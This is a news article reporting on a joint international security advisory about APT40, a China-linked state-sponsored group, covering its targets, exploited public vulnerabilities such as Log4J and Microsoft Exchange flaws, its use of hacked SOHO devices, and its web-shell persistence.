Australia and its allies have released a joint security advisory highlighting malicious cyber operations conducted by a state-sponsored China-linked threat actor.

Tracked as APT40, Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk, the treat actor is believed to be working on behalf of China's Ministry of State Security, the country’s foreign intelligence agency.

“APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing,” said the report co-authored by cyber security agencies for the United States, Britain, Canada, New Zealand, Japan, South Korea and Germany.

The threat actor is able to swiftly adapt proof-of-concept exploits (PoCs) of new vulnerabilities and immediately use them against target networks.

“APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017,” the report said.

The list of exploited vulnerabilities includes public flaws in popularsoftware such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021- 26084) and Microsoft Exchange (CVE-2021-31207; CVE-2021-34523; CVE-2021-34473).

Previously, APT40 used compromised Australian websites as command and control (C2) servers for its operations, but now the group is utilizing hacked devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors. Many of these SOHO devices are end-of-life or unpatched and offer a soft target for N-day exploitation.

“APT40 does occasionally use procured or leased infrastructure as victim-facing C2 infrastructure in its operations, however, this tradecraft appears to be in relative decline,” the report noted.

The group’s primary attack methods include phishing campaigns and the use of valid credentials to enable a range of follow-on activities. Once compromising the network, the threat actor attempts to establish persistence via a web shell to maintain access on the victim’s environment.

More technical details on APT40’s TTPs can be found here.